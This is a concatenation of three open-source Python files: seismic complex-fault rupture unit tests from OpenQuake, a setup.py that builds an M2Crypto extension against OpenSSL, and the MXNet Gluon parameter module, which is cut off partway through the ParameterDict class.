        #                Point(0.0,0.0359728811758,0.0),
        #                Point(0.0190775080917,0.0550503815181,0.0),
        #                Point(0.03974514139,0.0723925718855,0.0)]
        # upper_seismo_depth = 0.0
        # lower_seismo_depth = 4.2426406871192848
        # dip = 45.0
        # mesh_spacing = 1.0
        # Being a regular surface and with points in the top and bottom edges
        # with a spacing that is a multiple of the given mesh spacing, the
        # expected mesh spacing is uniform and equal to the mesh_spacing given
        # in the constructor, that is 1 km. Each mesh cell has an area of
        # 1 squared km.
        # In this case the fmd contains only one magnitude (3.5), and this
        # originates ruptures with area equal to 0.31622776601683794 km**2
        # (according to PeerTestMagAreaScalingRel area = 10**(3.5-4))
        # given an aspect ratio of 1, the rupture dimensions are:
        # rup_length = sqrt(0.31622776601683794 * 1) = 0.56234132519034907
        # rup_width = 0.56234132519034907
        # Rupture length corresponds therefore to two nodes along length, and
        # two nodes along width provides the closest area value, so each
        # rupture extends for two nodes along length and 2 nodes along width.
        # Given 11 nodes along length, and 7 along width, and assuming the
        # rupture offset to be equal to mesh_spacing, the total number
        # of ruptures along length is 10 and along width is 6. So the total
        # number is 60. the rate associated to a magnitude 3.5 from the
        # truncated GR (with bin width = 1.0) is 10**(0.5 -3.0) - 10**(0.5-4.0)
        # = 0.0028460498941515417. the rate associated to each rupture is
        # 0.0028460498941515417 / 60 = 4.7434164902525696e-05
        # for each rupture the probability of one or more occurrences is
        # 1-exp(- 4.7434164902525696e-05 * 50.0) = 0.0023688979672850108
        source = self._make_source(test_data.TEST2_MFD,
                                   test_data.TEST2_RUPTURE_ASPECT_RATIO,
                                   test_data.TEST2_MESH_SPACING,
                                   test_data.TEST2_EDGES)
        self._test_ruptures(test_data.TEST2_RUPTURES, source)
    def test_3(self):
        # Complex fault source equivalent to Simple fault source defined by
        # top, bottom and intermediate edges. That is the complex fault surface
        # is equivalent to a simple fault surface defined in the following way:
        # fault_trace = [Point(0.0,0.0,0.0),
        #                Point(0.0,0.0359728811758,0.0),
        #                Point(0.0190775080917,0.0550503815181,0.0),
        #                Point(0.03974514139,0.0723925718855,0.0)]
        # upper_seismo_depth = 0.0
        # lower_seismo_depth = 4.2426406871192848
        # dip = 45.0
        # mesh_spacing = 1.0
        # Being a regular surface and with points in the top and bottom edges
        # with a spacing that is a multiple of the given mesh spacing, the
        # expected mesh spacing is uniform and equal to the mesh_spacing given
        # in the constructor, that is 1 km. Each mesh cell has an area of
        # 1 squared km.
        # In this case the fmd contains only one magnitude (6.5), and this
        # originates ruptures with area equal to 316.22776601683796 km**2
        # (according to PeerTestMagAreaScalingRel area = 10**(6.5-4))
        # assuming an aspect ratio of 1.0, the rupture dimensions are:
        # rup_length = sqrt(316.22776601683796 * 1.0) = 17.782794100389228
        # rup_width = 17.782794100389228
        # rupture dimensions are clipped to fault dimensions In this case each
        # rupture extends for 11 nodes along length and 7 nodes along width.
        # The total number of ruptures is 1. the rate associated to a magnitude
        # 6.5 from the truncated GR (bin width = 1) is
        # 10**(0.5 - 6.0) - 10**(0.5 - 7.0) = 2.8460498941515413e-06
        # the rate associated to each rupture is
        # 2.8460498941515413e-06 / 1 = 2.8460498941515413e-06
        # for each rupture the probability of one or more occurrences is
        # 1-exp(- 2.8460498941515413e-06 * 50.0) = 0.00014229237018781316
        source = self._make_source(test_data.TEST3_MFD,
                                   test_data.TEST3_RUPTURE_ASPECT_RATIO,
                                   test_data.TEST3_MESH_SPACING,
                                   test_data.TEST3_EDGES)
        self._test_ruptures(test_data.TEST3_RUPTURES, source)
    def test_4(self):
        # test 4 (Complex fault with top, bottom and intermediate edges with
        # variable length)
        # top edge length = 3 km
        # intermediate edge = 6 km
        # bottom edge = 9 km
        # the spacing between edges along depth is of 1 km. Average length is
        # 6 km. Assuming a mesh spacing = 2 km, the number of points per edge
        # is 6 / 2 + 1 = 4. Consequently, top edge has a spacing of 1km,
        # intermediate edge of 2 km, and bottom edge 3km. each cell area is
        # a vertical trapezoid.
        # cells area in the first row is ((1 + 2) / 2) * 1) = 1.5 km**2
        # cells area in the second row is ((2 + 3) / 2 * 1) = 2.5 km**2
        # In this case the fmd contains only one magnitude (4.0),
        # and this originates ruptures with area equal to 1 km**2 (according to
        # PeerTestMagAreaScalingRel area = 10**(4.0-4)). assuming an aspect
        # ratio of 1.0, the rupture dimensions are:
        # rup_length = sqrt(1.0 * 1.0) = 1.0
        # rup_width = 1.0
        #
        # With these setting, 3 ruptures will be generated in the first row,
        # and 3 ruptures in the second row. so the expected total number
        # of rupture is 6. each rupture consists of 4 points.
        #
        # the rate associated to a magnitude 4.0 from the truncated GR (bin
        # width = 0.1) is 10**(0.5 - 3.95) - 10**(0.5 - 4.05) = 7.29750961e-5
        # the rate associated to each rupture is therefore 7.29750961e-5 / 6
        # = 1.216251602e-05
        source = self._make_source(test_data.TEST4_MFD,
                                   test_data.TEST4_RUPTURE_ASPECT_RATIO,
                                   test_data.TEST4_MESH_SPACING,
                                   test_data.TEST4_EDGES)
        self._test_ruptures(test_data.TEST4_RUPTURES, source)
class ComplexFaultSourceRupEnclPolyTestCase(
        simple_fault_test.SimpleFaultRupEncPolyTestCase):
    # test that complex fault sources of simple geometry behave
    # exactly the same as simple fault sources of the same geometry
    def _make_source(self, mfd, aspect_ratio, fault_trace, dip):
        """Re-create the parent's simple fault source as an equivalent
        two-edge ComplexFaultSource."""
        sf = super(ComplexFaultSourceRupEnclPolyTestCase, self)._make_source(
            mfd, aspect_ratio, fault_trace, dip
        )
        # create an equivalent top and bottom edges
        vdist_top = sf.upper_seismogenic_depth
        vdist_bottom = sf.lower_seismogenic_depth
        # horizontal offsets of the two edges implied by the dip angle
        hdist_top = vdist_top / numpy.tan(numpy.radians(dip))
        hdist_bottom = vdist_bottom / numpy.tan(numpy.radians(dip))
        strike = fault_trace[0].azimuth(fault_trace[-1])
        # edges are shifted perpendicular to the strike direction
        azimuth = (strike + 90.0) % 360
        top_edge = []
        bottom_edge = []
        for point in fault_trace.points:
            top_edge.append(point.point_at(hdist_top, vdist_top, azimuth))
            bottom_edge.append(point.point_at(hdist_bottom, vdist_bottom,
                                              azimuth))
        edges = [Line(top_edge), Line(bottom_edge)]
        return ComplexFaultSource(
            sf.source_id, sf.name, sf.tectonic_region_type,
            sf.mfd, sf.rupture_mesh_spacing,
            sf.magnitude_scaling_relationship, sf.rupture_aspect_ratio,
            sf.temporal_occurrence_model, edges, sf.rake
        )
class FloatRupturesTestCase(unittest.TestCase):
    """Unit tests for the _float_ruptures() helper: given per-cell area and
    length arrays it returns the list of mesh slices a rupture can occupy."""
    def test_reshaping_along_length(self):
        cell_area = numpy.array([[1, 1, 1],
                                 [1, 1, 1]], dtype=float)
        cell_length = numpy.array([[1, 1, 1],
                                   [1, 1, 1]], dtype=float)
        rupture_area = 3.1
        rupture_length = 1.0
        slices = _float_ruptures(rupture_area, rupture_length,
                                 cell_area, cell_length)
        self.assertEqual(len(slices), 2)
        s1, s2 = slices
        self.assertEqual(s1, (slice(0, 3), slice(0, 3)))
        self.assertEqual(s2, (slice(0, 3), slice(1, 4)))
        # a larger rupture area no longer fits in two positions along length
        rupture_area = 4.2
        slices = _float_ruptures(rupture_area, rupture_length,
                                 cell_area, cell_length)
        self.assertEqual(len(slices), 1)
        self.assertEqual(slices, [s1])
    def test_reshaping_along_width(self):
        cell_area = numpy.array([[4, 4],
                                 [4, 4],
                                 [2, 2]], dtype=float)
        cell_length = numpy.array([[2, 2], [2, 2], [2, 2]], dtype=float)
        rupture_area = 13.0
        rupture_length = 12.0
        slices = _float_ruptures(rupture_area, rupture_length,
                                 cell_area, cell_length)
        self.assertEqual(len(slices), 2)
        s1, s2 = slices
        self.assertEqual(s1, (slice(0, 3), slice(0, 3)))
        self.assertEqual(s2, (slice(1, 4), slice(0, 3)))
    def test_varying_width(self):
        # cells of unequal area make the floating positions asymmetric
        cell_area = numpy.array([[1, 1, 1],
                                 [1, 0.1, 1],
                                 [1, 0.1, 1]], dtype=float)
        cell_length = numpy.array([[1, 1, 1], [1, 1, 1], [1, 1, 1]],
                                  dtype=float)
        rupture_area = 2.1
        rupture_length = 1.0
        slices = _float_ruptures(rupture_area, rupture_length,
                                 cell_area, cell_length)
        self.assertEqual(len(slices), 6)
        tl, tm, tr, bl, bm, br = slices
        self.assertEqual(tl, (slice(0, 3), slice(0, 2)))
        self.assertEqual(tm, (slice(0, 4), slice(1, 3)))
        self.assertEqual(tr, (slice(0, 3), slice(2, 4)))
        self.assertEqual(bl, (slice(1, 4), slice(0, 2)))
        self.assertEqual(bm, (slice(1, 4), slice(1, 3)))
        self.assertEqual(br, (slice(1, 4), slice(2, 4)))
class ModifyComplexFaultGeometryTestCase(unittest.TestCase):
    """Tests for replacing a ComplexFaultSource's geometry in place via
    modify_set_geometry()."""
    def setUp(self):
        # a simple two-edge fault plus common source parameters
        top_edge_1 = Line([Point(30.0, 30.0, 1.0), Point(31.0, 30.0, 1.0)])
        bottom_edge_1 = Line([Point(29.7, 29.9, 30.0),
                              Point(31.3, 29.9, 32.0)])
        self.edges = [top_edge_1, bottom_edge_1]
        self.mfd = EvenlyDiscretizedMFD(7.0, 0.1, [1.0])
        self.aspect = 1.0
        self.spacing = 5.0
        self.rake = 90.
    def _make_source(self, edges):
        """Build a subduction-interface ComplexFaultSource from *edges*."""
        source_id = name = 'test-source'
        trt = "Subduction Interface"
        tom = PoissonTOM(50.0)
        magnitude_scaling_relationship = PeerMSR()
        cfs = ComplexFaultSource(
            source_id, name, trt, self.mfd, self.spacing,
            magnitude_scaling_relationship, self.aspect, tom,
            edges, self.rake
        )
        return cfs
    def test_modify_geometry(self):
        # the new edge coordinates must be reflected point by point
        fault = self._make_source(self.edges)
        # Modify the edges
        top_edge_2 = Line([Point(29.9, 30.0, 2.0), Point(31.1, 30.0, 2.1)])
        bottom_edge_2 = Line([Point(29.6, 29.9, 29.0),
                              Point(31.4, 29.9, 33.0)])
        fault.modify_set_geometry([top_edge_2, bottom_edge_2], self.spacing)
        exp_lons_top = [29.9, 31.1]
        exp_lats_top = [30.0, 30.0]
        exp_depths_top = [2.0, 2.1]
        exp_lons_bot = [29.6, 31.4]
        exp_lats_bot = [29.9, 29.9]
        exp_depths_bot = [29.0, 33.0]
        for iloc in range(len(fault.edges[0])):
            self.assertAlmostEqual(fault.edges[0].points[iloc].longitude,
                                   exp_lons_top[iloc])
            self.assertAlmostEqual(fault.edges[0].points[iloc].latitude,
                                   exp_lats_top[iloc])
            self.assertAlmostEqual(fault.edges[0].points[iloc].depth,
                                   exp_depths_top[iloc])
        for iloc in range(len(fault.edges[1])):
            self.assertAlmostEqual(fault.edges[1].points[iloc].longitude,
                                   exp_lons_bot[iloc])
            self.assertAlmostEqual(fault.edges[1].points[iloc].latitude,
                                   exp_lats_bot[iloc])
            self.assertAlmostEqual(fault.edges[1].points[iloc].depth,
                                   exp_depths_bot[iloc])
| gem/oq-hazardlib | openquake/hazardlib/tests/source/complex_fault_test.py | Python | agpl-3.0 | 18,749 |
from distutils.core import setup
from distutils.command import build_ext
from distutils.core import Extension
import os, sys
def load_description():
    """Return the contents of README.rst, or '' when it cannot be read.

    Used for setup()'s long_description; installing from a distribution
    that lacks the README must not fail, hence the best-effort fallback.
    """
    try:
        # `with` guarantees the handle is closed even if read() raises;
        # the original bare `except:` also swallowed SystemExit et al.
        with open('README.rst', 'r') as f:
            return f.read()
    except Exception:
        return ""
class OpensslBuilder(build_ext.build_ext):
    """
    Specialization of build_ext to enable swig_opts to inherit any
    include_dirs settings made at the command line or in a setup.cfg
    file
    """
    # extra command-line options: --openssl=<prefix> / -o, and --swig-extra
    user_options = build_ext.build_ext.user_options + [
        ('openssl=', 'o', 'Prefix for openssl installation location'),
        ('swig-extra=', None, 'Extra swig options')]
    def initialize_options(self):
        """Set platform-appropriate defaults for libraries and the prefix."""
        build_ext.build_ext.initialize_options(self)
        self.swig_extra = None
        if os.name == 'nt':
            self.libraries = ['ssleay32', 'libeay32']
            self.openssl = 'c:\\pkg'
        else:
            self.libraries = ['ssl', 'crypto']
            self.openssl = '/usr'
    def finalize_options(self):
        """Derive swig, include and library paths from the OpenSSL prefix."""
        build_ext.build_ext.finalize_options(self)
        openssl_include = os.path.join(self.openssl, 'include')
        openssl_lib = os.path.join(self.openssl, 'lib')
        # forward every include dir (plus OpenSSL's headers) to swig
        self.swig_opts = ['-I%s' % i for i in self.include_dirs + [openssl_include]] + ['-includeall', '-noproxy']
        if self.swig_extra is not None:
            # accept either a single option string or a list of options
            if hasattr(self.swig_extra, 'pop'):
                self.swig_opts.extend(self.swig_extra)
            else:
                self.swig_opts.append(self.swig_extra)
        self.include_dirs.append(openssl_include)
        self.library_dirs.append(openssl_lib)
# C extension wrapping OpenSSL; swig generates the bindings from m2ext.i
m2ext = Extension(name="m2ext._m2ext",
                  sources=["swig/m2ext.i"],
                  extra_compile_args=["-DTHREADING"])
setup(
    name='m2ext',
    version='0.1',
    description='M2Crypto Extensions',
    long_description=load_description(),
    author='Lev Shamardin',
    author_email='shamardin@gmail.com',
    license='BSD',
    url='https://github.com/abbot/m2ext',
    ext_modules = [m2ext],
    packages=["m2ext"],
    # custom build_ext adds the --openssl/--swig-extra options above
    cmdclass = {'build_ext': OpensslBuilder},
)
| abbot/m2ext | setup.py | Python | bsd-2-clause | 2,152 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=
"""Neural network parameter."""
__all__ = ['DeferredInitializationError', 'Parameter', 'Constant',
'ParameterDict', 'tensor_types']
from collections import OrderedDict
import warnings
import numpy as np
from ..base import mx_real_t, MXNetError
from .. import symbol, ndarray, initializer, context
from ..context import Context, cpu
from .. import autograd
from .utils import _indent, _brief_print_list
# pylint: disable= invalid-name
tensor_types = (symbol.Symbol, ndarray.NDArray)
# pylint: enable= invalid-name
class DeferredInitializationError(MXNetError):
    """Raised when a deferred-initialized Parameter is touched before its
    shape has been inferred by the first forward pass."""
class Parameter(object):
    """A Container holding parameters (weights) of Blocks.
    :py:class:`Parameter` holds a copy of the parameter on each :py:class:`Context` after
    it is initialized with ``Parameter.initialize(...)``. If :py:attr:`grad_req` is
    not ``'null'``, it will also hold a gradient array on each :py:class:`Context`::
        ctx = mx.gpu(0)
        x = mx.nd.zeros((16, 100), ctx=ctx)
        w = mx.gluon.Parameter('fc_weight', shape=(64, 100), init=mx.init.Xavier())
        b = mx.gluon.Parameter('fc_bias', shape=(64,), init=mx.init.Zero())
        w.initialize(ctx=ctx)
        b.initialize(ctx=ctx)
        out = mx.nd.FullyConnected(x, w.data(ctx), b.data(ctx), num_hidden=64)
    Parameters
    ----------
    name : str
        Name of this parameter.
    grad_req : {'write', 'add', 'null'}, default 'write'
        Specifies how to update gradient to grad arrays.
        - ``'write'`` means everytime gradient is written to grad :py:class:`NDArray`.
        - ``'add'`` means everytime gradient is added to the grad :py:class:`NDArray`. You need
          to manually call ``zero_grad()`` to clear the gradient buffer before each
          iteration when using this option.
        - 'null' means gradient is not requested for this parameter. gradient arrays
          will not be allocated.
    shape : tuple of int, default None
        Shape of this parameter. By default shape is not specified. Parameter with
        unknown shape can be used for :py:class:`Symbol` API, but ``init`` will throw an error
        when using :py:class:`NDArray` API.
    dtype : numpy.dtype or str, default 'float32'
        Data type of this parameter. For example, ``numpy.float32`` or ``'float32'``.
    lr_mult : float, default 1.0
        Learning rate multiplier. Learning rate will be multiplied by lr_mult
        when updating this parameter with optimizer.
    wd_mult : float, default 1.0
        Weight decay multiplier (L2 regularizer coefficient). Works similar to lr_mult.
    init : Initializer, default None
        Initializer of this parameter. Will use the global initializer by default.
    Attributes
    ----------
    grad_req : {'write', 'add', 'null'}
        This can be set before or after initialization. Setting ``grad_req`` to ``'null'``
        with ``x.grad_req = 'null'`` saves memory and computation when you don't
        need gradient w.r.t x.
    lr_mult : float
        Local learning rate multiplier for this Parameter. The actual learning rate
        is calculated with ``learning_rate * lr_mult``. You can set it with
        ``param.lr_mult = 2.0``
    wd_mult : float
        Local weight decay multiplier for this Parameter.
    """
    def __init__(self, name, grad_req='write', shape=None, dtype=mx_real_t,
                 lr_mult=1.0, wd_mult=1.0, init=None, allow_deferred_init=False,
                 differentiable=True):
        self._var = None
        self._data = None
        self._grad = None
        self._ctx_list = None
        self._ctx_map = None
        # Empty tuple means "no deferred init pending"; a non-empty 4-tuple
        # (init, ctx, default_init, data) means initialization is deferred.
        self._deferred_init = ()
        self._differentiable = differentiable
        self._allow_deferred_init = allow_deferred_init
        self._grad_req = None
        self._shape = shape
        self.name = name
        self.dtype = dtype
        self.lr_mult = lr_mult
        self.wd_mult = wd_mult
        # Assigned via the property setter so 'null'/differentiable logic runs.
        self.grad_req = grad_req
        self.init = init
    def __repr__(self):
        s = 'Parameter {name} (shape={shape}, dtype={dtype})'
        return s.format(name=self.name, shape=self.shape, dtype=self.dtype)
    @property
    def grad_req(self):
        return self._grad_req
    @grad_req.setter
    def grad_req(self, req):
        assert req in ['write', 'add', 'null'], \
            "grad_req must be one of 'write', 'add', or 'null', but got '%s'"%req
        if not self._differentiable:
            req = 'null'
        if self._grad_req == req:
            return
        self._grad_req = req
        if req == 'null' and self._grad is not None:
            # Drop grad buffers and detach data from the autograd graph.
            self._grad = None
            self._data = [i.detach() for i in self._data]
        elif self._data is not None:
            self._init_grad()
    @property
    def shape(self):
        return self._shape
    @shape.setter
    def shape(self, new_shape):
        if self._shape is None:
            self._shape = new_shape
            return
        # A stored dim of 0 means "unknown" and may be filled in by new_shape.
        assert len(self._shape) == len(new_shape) and \
            all(j == 0 or i == j for i, j in zip(new_shape, self._shape)), \
            "Expected shape %s is incompatible with given shape %s."%(
                str(new_shape), str(self._shape))
        self._shape = new_shape
    def _check_and_get(self, arr_list, ctx):
        """Return the copy (or copies) of this parameter for ``ctx``,
        raising informative errors when uninitialized.  ``ctx is list`` is a
        sentinel meaning "return all copies"."""
        if arr_list is not None:
            if ctx is list:
                return arr_list
            if ctx is None:
                if len(arr_list) == 1:
                    return arr_list[0]
                else:
                    ctx = context.current_context()
            # _ctx_map has two buckets selected by device_typeid & 1.
            ctx_list = self._ctx_map[ctx.device_typeid&1]
            if ctx.device_id < len(ctx_list):
                idx = ctx_list[ctx.device_id]
                if idx is not None:
                    return arr_list[idx]
            raise RuntimeError(
                "Parameter '%s' was not initialized on context %s. "
                "It was only initialized on %s."%(
                    self.name, str(ctx), str(self._ctx_list)))
        if self._deferred_init:
            raise DeferredInitializationError(
                "Parameter '%s' has not been initialized yet because initialization was " \
                "deferred. Actual initialization happens during the first forward pass. " \
                "Please pass one batch of data through the network before accessing Parameters. " \
                "You can also avoid deferred initialization by specifying in_units, " \
                "num_features, etc., for network layers."%(self.name))
        raise RuntimeError(
            "Parameter '%s' has not been initialized. Note that " \
            "you should initialize parameters and create Trainer " \
            "with Block.collect_params() instead of Block.params " \
            "because the later does not include Parameters of " \
            "nested child Blocks"%(self.name))
    def _load_init(self, data, ctx):
        """(Re)initializes by loading from data."""
        if self.shape:
            for self_dim, data_dim in zip(self.shape, data.shape):
                assert self_dim == 0 or self_dim == data_dim, \
                    "Failed loading Parameter '%s' from saved params: " \
                    "shape incompatible expected %s vs saved %s"%(
                        self.name, str(self.shape), str(data.shape))
            # Fill unknown (0) dims from the loaded array's shape.
            self.shape = tuple(i if i != 0 else j for i, j in zip(self.shape, data.shape))
        if self.dtype:
            assert np.dtype(self.dtype).type == data.dtype, \
                "Failed loading Parameter '%s' from saved params: " \
                "dtype incompatible expected %s vs saved %s"%(
                    self.name, str(self.dtype), str(data.dtype))
        if isinstance(ctx, Context):
            ctx = [ctx]
        if self._data is None:
            if self._deferred_init:
                assert ctx is None or set(ctx) == set(self._deferred_init[1]), \
                    "Failed to load Parameter '%s' on %s because it was " \
                    "previous initialized on %s."%(
                        self.name, str(ctx), str(self.list_ctx()))
                ctx = self._deferred_init[1]
            elif ctx is None:
                ctx = [cpu()]
            self._init_impl(data, ctx)
        else:
            assert ctx is None or set(ctx) == set(self.list_ctx()), \
                "Failed to load Parameter '%s' on %s because it was " \
                "previous initialized on %s."%(
                    self.name, str(ctx), str(self.list_ctx()))
            self.set_data(data)
        self._deferred_init = ()
    def _finish_deferred_init(self):
        """Finishes deferred initialization."""
        if not self._deferred_init:
            return
        init, ctx, default_init, data = self._deferred_init
        self._deferred_init = ()
        assert self.shape is not None and np.prod(self.shape) > 0, \
            "Cannot initialize Parameter '%s' because it has " \
            "invalid shape: %s. Please specify in_units, " \
            "in_channels, etc for `Block`s."%(
                self.name, str(self.shape))
        with autograd.pause():
            if data is None:
                data = ndarray.zeros(shape=self.shape, dtype=self.dtype,
                                     ctx=context.cpu())
                initializer.create(default_init)(
                    initializer.InitDesc(self.name, {'__init__': init}), data)
            self._init_impl(data, ctx)
    def _init_impl(self, data, ctx_list):
        """Sets data and grad."""
        self._ctx_list = list(ctx_list)
        # Build the (device_typeid & 1, device_id) -> index lookup table used
        # by _check_and_get.
        self._ctx_map = [[], []]
        for i, ctx in enumerate(self._ctx_list):
            dev_list = self._ctx_map[ctx.device_typeid&1]
            while len(dev_list) <= ctx.device_id:
                dev_list.append(None)
            dev_list[ctx.device_id] = i
        self._data = [data.copyto(ctx) for ctx in self._ctx_list]
        self._init_grad()
    def _init_grad(self):
        """Initialize grad buffers."""
        if self.grad_req == 'null':
            self._grad = None
            return
        self._grad = [ndarray.zeros_like(i) for i in self._data]
        autograd.mark_variables(self.list_data(), self.list_grad(), self.grad_req)
    def _reduce(self):
        """Reduce data from multiple context."""
        block = self.list_data()
        data = ndarray.add_n(*(w.copyto(context.cpu()) for w in block)) / len(block)
        return data
    def initialize(self, init=None, ctx=None, default_init=initializer.Uniform(),
                   force_reinit=False):
        """Initializes parameter and gradient arrays. Only used for :py:class:`NDArray` API.
        Parameters
        ----------
        init : Initializer
            The initializer to use. Overrides :py:meth:`Parameter.init` and default_init.
        ctx : Context or list of Context, defaults to :py:meth:`context.current_context()`.
            Initialize Parameter on given context. If ctx is a list of Context, a
            copy will be made for each context.
            .. note::
                Copies are independent arrays. User is responsible for keeping
                their values consistent when updating.
                Normally :py:class:`gluon.Trainer` does this for you.
        default_init : Initializer
            Default initializer is used when both :py:func:`init`
            and :py:meth:`Parameter.init` are ``None``.
        force_reinit : bool, default False
            Whether to force re-initialization if parameter is already initialized.
        Examples
        --------
        >>> weight = mx.gluon.Parameter('weight', shape=(2, 2))
        >>> weight.initialize(ctx=mx.cpu(0))
        >>> weight.data()
        [[-0.01068833 0.01729892]
         [ 0.02042518 -0.01618656]]
        <NDArray 2x2 @cpu(0)>
        >>> weight.grad()
        [[ 0. 0.]
         [ 0. 0.]]
        <NDArray 2x2 @cpu(0)>
        >>> weight.initialize(ctx=[mx.gpu(0), mx.gpu(1)])
        >>> weight.data(mx.gpu(0))
        [[-0.00873779 -0.02834515]
         [ 0.05484822 -0.06206018]]
        <NDArray 2x2 @gpu(0)>
        >>> weight.data(mx.gpu(1))
        [[-0.00873779 -0.02834515]
         [ 0.05484822 -0.06206018]]
        <NDArray 2x2 @gpu(1)>
        """
        if self._data is not None and not force_reinit:
            warnings.warn("Parameter '%s' is already initialized, ignoring. " \
                          "Set force_reinit=True to re-initialize."%self.name,
                          stacklevel=2)
            return
        self._data = self._grad = None
        if ctx is None:
            ctx = [context.current_context()]
        if isinstance(ctx, Context):
            ctx = [ctx]
        if init is None:
            init = default_init if self.init is None else self.init
        if not self.shape or np.prod(self.shape) <= 0:
            if self._allow_deferred_init:
                self._deferred_init = (init, ctx, default_init, None)
                return
            raise ValueError("Cannot initialize Parameter '%s' because it has " \
                             "invalid shape: %s."%(self.name, str(self.shape)))
        self._deferred_init = (init, ctx, default_init, None)
        self._finish_deferred_init()
    def reset_ctx(self, ctx):
        """Re-assign Parameter to other contexts.
        ctx : Context or list of Context, default ``context.current_context()``.
            Assign Parameter to given context. If ctx is a list of Context, a
            copy will be made for each context.
        """
        if ctx is None:
            ctx = [context.current_context()]
        if isinstance(ctx, Context):
            ctx = [ctx]
        if self._data:
            data = self._reduce()
            with autograd.pause():
                self._init_impl(data, ctx)
        elif self._deferred_init:
            init, _, default_init, data = self._deferred_init
            self._deferred_init = (init, ctx, default_init, data)
        else:
            raise ValueError("Cannot reset context for Parameter '%s' because it "
                             "has not been initialized."%self.name)
    def set_data(self, data):
        """Sets this parameter's value on all contexts."""
        self.shape = data.shape
        if self._data is None:
            # BUGFIX: _deferred_init is () when nothing is pending (never
            # None), so the previous `is not None` check could never fail.
            # Test truthiness so uninitialized parameters are caught.
            assert self._deferred_init, \
                "Parameter '%s' has not been initialized"%self.name
            self._deferred_init = self._deferred_init[:3] + (data,)
            return
        for arr in self.list_data():
            arr[:] = data
    def data(self, ctx=None):
        """Returns a copy of this parameter on one context. Must have been
        initialized on this context before.
        Parameters
        ----------
        ctx : Context
            Desired context.
        Returns
        -------
        NDArray on ctx
        """
        return self._check_and_get(self._data, ctx)
    def list_data(self):
        """Returns copies of this parameter on all contexts, in the same order
        as creation."""
        return self._check_and_get(self._data, list)
    def grad(self, ctx=None):
        """Returns a gradient buffer for this parameter on one context.
        Parameters
        ----------
        ctx : Context
            Desired context.
        """
        if self._data is not None and self._grad is None:
            raise RuntimeError(
                "Cannot get gradient array for Parameter '%s' " \
                "because grad_req='null'"%(self.name))
        return self._check_and_get(self._grad, ctx)
    def list_grad(self):
        """Returns gradient buffers on all contexts, in the same order
        as :py:meth:`values`."""
        if self._data is not None and self._grad is None:
            raise RuntimeError(
                "Cannot get gradient array for Parameter '%s' " \
                "because grad_req='null'"%(self.name))
        return self._check_and_get(self._grad, list)
    def list_ctx(self):
        """Returns a list of contexts this parameter is initialized on."""
        if self._data is None:
            if self._deferred_init:
                return self._deferred_init[1]
            raise RuntimeError("Parameter '%s' has not been initialized"%self.name)
        return self._ctx_list
    def zero_grad(self):
        """Sets gradient buffer on all contexts to 0. No action is taken if
        parameter is uninitialized or doesn't require gradient."""
        if self._grad is None:
            return
        for i in self._grad:
            i[:] = 0
    def var(self):
        """Returns a symbol representing this parameter."""
        if self._var is None:
            self._var = symbol.var(self.name, shape=self.shape, dtype=self.dtype,
                                   lr_mult=self.lr_mult, wd_mult=self.wd_mult,
                                   init=self.init)
        return self._var
    def cast(self, dtype):
        """Cast data and gradient of this Parameter to a new data type.
        Parameters
        ----------
        dtype : str or numpy.dtype
            The new data type.
        """
        self.dtype = dtype
        if self._data is None:
            return
        with autograd.pause():
            self._data = [i.astype(dtype) for i in self._data]
            if self._grad is None:
                return
            self._grad = [i.astype(dtype) for i in self._grad]
            autograd.mark_variables(self._data, self._grad, self.grad_req)
class Constant(Parameter):
    """A constant parameter for holding immutable tensors.
    `Constant`s are ignored by `autograd` and `Trainer`, thus their values
    will not change during training. But you can still update their values
    manually with the `set_data` method.
    `Constant`s can be created with either::
        const = mx.gluon.Constant('const', [[1,2],[3,4]])
    or::
        class Block(gluon.Block):
            def __init__(self, **kwargs):
                super(Block, self).__init__(**kwargs)
                self.const = self.params.get_constant('const', [[1,2],[3,4]])
    Parameters
    ----------
    name : str
        Name of the parameter.
    value : array-like
        Initial value for the constant.
    """
    def __init__(self, name, value):
        if not isinstance(value, ndarray.NDArray):
            value = ndarray.array(value)
        self.value = value
        # Each Constant registers its own one-off Initializer class that
        # copies `value` into the target array; the alias is made unique
        # per instance via id(self) so repeated names don't collide.
        class Init(initializer.Initializer):
            def _init_weight(self, _, arr):
                value.copyto(arr)
        init_name = 'Constant_{}_{}'.format(name, id(self))
        initializer.alias(init_name)(Init)
        # grad_req='null' makes autograd/Trainer skip this parameter.
        super(Constant, self).__init__(
            name, grad_req='null', shape=value.shape, dtype=value.dtype,
            init=init_name)
    def __repr__(self):
        s = 'Constant {name} (shape={shape}, dtype={dtype})'
        return s.format(name=self.name, shape=self.shape, dtype=self.dtype)
class ParameterDict(object):
    """A dictionary managing a set of parameters.
    Parameters
    ----------
    prefix : str, default ``''``
        The prefix to be prepended to all Parameters' names created by this dict.
    shared : ParameterDict or None
        If not ``None``, when this dict's :py:meth:`get` method creates a new parameter, will
        first try to retrieve it from "shared" dict. Usually used for sharing
        parameters with another Block.
    """
    def __init__(self, prefix='', shared=None):
        self._prefix = prefix
        # OrderedDict preserves creation order for save/load and iteration.
        self._params = OrderedDict()
        self._shared = shared
    def __repr__(self):
        s = '{name}(\n{content}\n)'
        name = self._prefix+' ' if self._prefix else ''
        return s.format(name=name,
                        content='\n'.join([_indent(' {0}'.format(v), 2)
                                           for v in self.values()]))
    def __getitem__(self, key):
        return self._params[key]
    def __iter__(self):
        return iter(self._params)
    def items(self):
        return self._params.items()
    def keys(self):
        return self._params.keys()
    def values(self):
        return self._params.values()
    @property
    def prefix(self):
        """Prefix of this dict. It will be prepended to :py:class:`Parameter`s' name created
        with :py:func:`get`."""
        return self._prefix
    def _get_impl(self, name):
        # Look up locally first; on a hit in the shared dict, cache the
        # shared Parameter locally so future lookups are direct.
        if name in self._params:
            return self._params[name]
        if self._shared is not None and name in self._shared._params:
            self._params[name] = self._shared._params[name]
            return self._shared._params[name]
        return None
    def get(self, name, **kwargs):
        """Retrieves a :py:class:`Parameter` with name ``self.prefix+name``. If not found,
        :py:func:`get` will first try to retrieve it from "shared" dict. If still not
